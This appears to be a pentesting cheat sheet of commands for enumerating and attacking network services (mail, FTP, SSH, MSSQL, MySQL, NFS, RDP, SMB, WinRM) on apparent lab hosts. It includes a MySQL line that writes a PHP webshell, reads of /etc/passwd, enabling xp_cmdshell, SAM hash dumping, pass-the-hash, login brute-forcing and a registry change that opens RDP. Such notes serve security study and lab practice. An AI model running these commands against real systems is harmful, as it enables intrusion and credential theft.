Email Services
Discovery of common ports used for email services:
1
sudo nmap -Pn -sV -sC -p25,143,110,465,993,995 10.129.14.128
Interact with POP3 and IMAP
Example with cURL:
1
curl -k 'imaps://10.129.14.128' --user user:p4ssw0rd
OpenSSL - TLS Encrypted Interaction POP3
To interact with the IMAP or POP3 server over SSL, we can use openssl, as well as ncat. The commands for this would look like this:
1
openssl s_client -connect 10.129.14.128:pop3s
OpenSSL - TLS Encrypted Interaction IMAP
1
openssl s_client -connect 10.129.14.128:imaps
IMAP Commands:
User’s login:
1
LOGIN <username> <password>
List all directories:
1
LIST "" *
Creates a mailbox with a specified name:
1
CREATE "<newName>"
Delete a mailbox:
1
DELETE "<newName>"
Renames a mailbox:
1
RENAME "<newName>" "<nameMailboxToBeChanged>"
Returns a subset of names from the set of names that the user has declared as being active or subscribed:
1
LSUB "" *
Select a mailbox so that messages in the mailbox can be accessed:
1
SELECT <nameMailbox>
Exits the selected mailbox:
1
UNSELECT <nameMailbox>
Retrieves data associated with a message in the mailbox:
1
FETCH <ID> all
Removes all messages with the deleted flag:
1
CLOSE
Closes the connection with the IMAP server:
1
LOGOUT
POP3 Commands
Identifies the user:
1
USER <username>
Authentication of the user using its password:
1
PASS <password>
Requests the number of saved emails from the server:
1
STAT
Request from the server the number and size of all emails:
1
LIST
Requests the server to deliver the requested email by ID:
1
RETR <ID>
Requests the server to delete the requested email by ID:
1
DELE <ID>
Requests the server to display the server capabilities:
1
CAPA
Requests the server to reset the transmitted information:
1
RSET
Closes the connection with the POP3 server:
1
QUIT
SMTP commands:
Service extension used to authenticate the client:
1
AUTH PLAIN
The client logs in with its computer name and thus starts the session:
1
HELO
The client names the email sender:
1
MAIL FROM
The client names the email recipient:
1
RCPT TO
The client initialites the transmission of the email:
1
DATA
The client aborts the transmission but keeps the connection between client and server:
1
RSET
The client checks if a mailbox is available for message transfer:
1
VRFY
This command can be used to enumerate existing users on the system. However, this does not always work.
1
VRFY <username>
Other way is to do a brute force attack to discover valid users:
1
smtp-user-enum -w 25 -M VRFY -u <pathUsersList> -t <IP>
The client also checks if a mailbox is available for messaging:
1
EXPN
Interact with Telnet:
1
telnet <IP> 25
FTP
Command syntax:
1
ftp <user>@<IP>
or:
1
ftp <IP>
Default credentials
Anonymous:’blank’
Common port
21 or 2121
Interesting commands
- List content: ls
- Download a file: get
- Download all: mget *
- Upload single file: put
Download All Available Files
1
wget -m --no-passive ftp://anonymous:anonymous@10.129.14.136:port
1
wget -m --no-passive ftp://user:password@IP:port
This can be useful when it allows you to access FTP as anonymous but does not allow you to download files.
Service interaction
1
nc -nv <IP> <port>
1
telnet <IP> <port>
It looks slightly different if the FTP server runs with TLS/SSL encryption. Because then we need a client that can handle TLS/SSL. For this, we can use the client openssl and communicate with the FTP server. The good thing about using openssl is that we can see the SSL certificate, which can also be helpful.
1
openssl s_client -connect <IP>:<port> -starttls ftp
SSH
Command syntax:
1
ssh <userName>@<IP> -p <port>
User enumeration (Metasploit)
1
msf> use scanner/ssh/ssh_enumusers
Connect with private key (without password)
It is neccesary to change the privs of RSA private key:
1
chmod 600 <idRSA>
Command to connect to SSH with the Private Key:
1
ssh <userName>@<IP> -p <port> -i <idRSA>
MSSQL
NMAP MSSQL Script Scan
1
sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.129.201.248
Many clients can be used to access a database running on MSSQL. Including but not limited to:
Connecting with Mssqlclient.py
1
python3 mssqlclient.py -p <port> <username>@<IP> -windows-auth
Tool: https://github.com/fortra/impacket/blob/master/examples/mssqlclient.py
Connecting with sqsh:
1
sqsh -S <IP> -U <username> -P '<password>' -h
When using Windows Authentication, we need to specify the domain name or the hostname of the target machine. If we are targetting a local account, we can use SERVERNAME\\accountname or .\\accountname. Example:
1
sqsh -S <IP> -U .\\<username> -P '<password>' -h
Connecting with sqlcmd
Example:
1
sqlcmd -S <server_name> -d <database_name> -U <username> -P <password> -Q "<Query;>"
Interesting commands:
List databases:
1
select name from sys.databases
or:
1
SELECT name FROM master.dbo.sysdatabases
Read local file:
1
2
1> SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
2> GO
Execute commands
1
2
3
1> xp_cmdshell '<ID>'
2> GO
If xp_cmdshell is not enabled, it can be enable using the following commands:
1> EXECUTE sp_configure 'show advanced options', 1
2> GO
3> RECONFIGURE
4> GO
5> EXECUTE sp_configure 'xp_cmdshell', 1
6> GO
7> RECONFIGURE
8> GO
Select a specific database:
1
USE <database>
Search tables
1
2
1> SELECT <table_name> FROM <bd>.INFORMATION_SCHEMA.TABLES
2> GO
Verifying our Current User and Role
1
2
3
1> SELECT SYSTEM_USER
2> SELECT IS_SRVROLEMEMBER('<username>')
3> GO
Identify Users that We Can Impersonate
1
2
3
4
5
6
1> SELECT distinct b.name
2> FROM sys.server_permissions a
3> INNER JOIN sys.server_principals b
4> ON a.grantor_principal_id = b.principal_id
5> WHERE a.permission_name = 'IMPERSONATE'
6> GO
Impersonating the SA User
1
2
3
4
1> EXECUTE AS LOGIN = 'sa'
2> SELECT SYSTEM_USER
3> SELECT IS_SRVROLEMEMBER('sysadmin')
4> GO
Identify linked Servers
1> SELECT srvname, isremote FROM sysservers
2> GO
Interesting modules in Metasploit
1
2
3
[msf] > auxiliary(scanner/mssql/mssql_login)
[msf] > auxiliary(admin/mssql/mssql_enum)
MySQL
Command syntax:
1
mysql -u <username> -p -h <IP>
If you have SSH access with a valid user, you can view the running processes. If the MySQL service is active on localhost, it can be accessed in the following manner:
1
user@kali:/$ mysql -p<password>
Information gathering
1
sudo nmap <IP> -sV -sC -p3306 --script mysql*
Detect version with Metasploit
1
msf> use auxiliary/scanner/mysql/mysql_version
Enumeration with Metasploit
1
msf> use auxiliary/admin/mysql/mysql_enum
Interesting commands
To show databases:
1
show databases;
Select database:
1
use <database>;
Show tables:
1
show tables;
More information about a table:
1
describe <tableName>;
To show columns from a table:
1
show columns from <table>;
Query example:
1
Select * from <table> where <column> = <string>";
Write local file:
1
select "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';
Read local file:
1
select LOAD_FILE("/etc/passwd");
NFS
Footprinting the service
1
sudo nmap <IP> -p111,2049 -sV -sC
The rpcinfo NSE script retrieves a list of all currently running RPC services, their names and descriptions, and the ports they use.
1
sudo nmap --script nfs* <IP> -sV -p111,2049
Show available NFS shares
1
showmount -e <IP>
Mounting NFS share:
1
2
3
4
5
6
7
mkdir <directory>
sudo mount -t nfs <IP>:/ ./<directory>/ -o nolock
cd <directory>
tree .
List Contents with Usernames & Group Names
1
ls -l mnt/nfs/
List Contents with UIDs & GUIDs
1
ls -n mnt/nfs/
Unmounting
1
sudo unmount <directory>
RDP - Remote Desktop Protocol
Footprinting the service
1
nmap -sV -sC <IP> -p3389 --script rdp*
The service is:
1
3389/tcp open ms-wbt-server Microsoft Terminal Services
Different ways to connect with known credentials
1
2
3
4
5
6
7
rdesktop -u <username> <IP>
rdesktop -d <domain> -u <username> -p <password> <IP>
xfreerdp [/d:domain] /u:<username> /p:<password> /v:<IP>
rdesktop <IP>
Modify the registry
Sometimes its neccesary to add a new registry key DisableRestrictedAdmin (REG_DWORD) under HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa.
If it doesn’t allow connection with xfreerdp, we connect using evilwinrm:
1
evil-winrm -i <IP> -u <username> -p <password>
And it is neccessary to write this:
1
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
Once the registry key is added, we can use xfreerdp to gain RDP access.
Pass the hash
1
xfreerdp [/d:domain] /u:<username> /pth:<hash> /v:<IP>
SMB (SAMBA)
Scan network
1
nbtscan -r <range>
Enumerating information with Enum4linux
Command syntax:
1
enum4linux -U -o -d <IP>
Other commands for enumeration:
1
2
3
nmblookup -A <IP>
tpcclient -U "" <IP>
Metasploit
1
[msf] > use auxiliary/scanner/smb/smb_login
List the shared resources of an SMB server:
Command syntax:
1
smbclient -L \\\\<IP>
with credentials:
1
smbclient -L \\\\<IP> -U <username>
Access to the shared resources of an SMB server:
Command syntax:
1
smbclient \\\\<IP>\\<directory>
With user:
1
smbclient \\\\<IP>\\<directory> -U <username>
Other way to access to SMB - rpcclient
1
rpcclient -U "" -N <IP>
With username:
1
rpcclient -U <username> <IP>
With credentials:
1
rpcclient -U <username>%<password> <IP>
Command for enumeration:
1
2
3
4
5
6
7
8
9
10
srvinfo
enumdomains
netshareenumall
enumdomusers
queryuser 0x3e9
Interesting commands:
1
2
3
4
5
6
7
8
9
ls
cd
get <file>
mget *
put <file>
Enumerate users
1
nmap -sU -sS --script=smb-enum-users <IP>
Crackmapexec
Syntax:
1
crackmapexec <protocol> <IP> -u <user> -p '<password>'
Example password attack:
1
crackmapexec <protocol> <IP> -u <userList> -p '<password>'
More examples:
1
crackmapexec smb 10.10.110.17 -u Administrator -p 'Password' -x 'whoami' --exec-method smbexec
1
crackmapexec smb 10.129.14.128 --shares -u '' -p ''
1
sudo crackmapexec smb 10.129.18.11 -u "user" -p /home/user/Desktop/pass.txt -d ATTCSVC-LINUX
If the type command doesn’t work to see files, you can use get file:
1
crackmapexec smb 10.129.84.255 -u Administrator -H 7796ee39fd3a9c3a1844556115ae1a54 --get-file Users/Administrator/Desktop/flag.txt /home/flag
Enumerating Users
1
crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --users
Enumerating Logged-on Users
1
crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users
Extract Hashes from SAM Database
1
crackmapexec smb 10.10.110.17 -u administrator -p 'Password123!' --sam
Pass-the-Hash (PtH)
1
crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE
PsExec
impacket-psexec is a tool in the Impacket framework that enables remote code execution on Windows systems using the SMB (Server Message Block) protocol. It allows authenticated users to execute commands or upload and run binaries on a remote Windows machine, simulating the behavior of the native Windows “psexec” tool.
1
impacket-psexec <username>:'<password'@<IP>
Responder
We can also abuse the SMB protocol by creating a fake SMB Server to capture users https://medium.com/@petergombos/lm-ntlm-net-ntlmv2-oh-my-a9b235c58ed4.
Syntax:
1
responder -I <interfaceName>
WinRM
Footprinting the service
1
nmap -sV -sC <IP> -p5985,5986 --disable-arp-ping -n
Connect with remote servers with evil-winrm
1
evil-winrm -i <IP> -u <username> -p <password>
Connect with WinRM with Powershell
1
2
3
PS C:\> $password = ConvertTo-SecureString "<password>" -AsPlainText -Force
PS C:\> $cred = new-object System.Management.Automation.PSCredential ("<domain>\<username>", $password)
PS C:\> Enter-PSSession -ComputerName <computername> -Credential $cred
Brute force with crackmapexec
1
crackmapexec <protocol> <IP> -u <user or userlist> -p <password or passwordlist>
Example:
1
crackmapexec winrm 10.129.42.197 -u user.list -p password.list
Other tool: https://github.com/y0k4i-1337/winrm-brute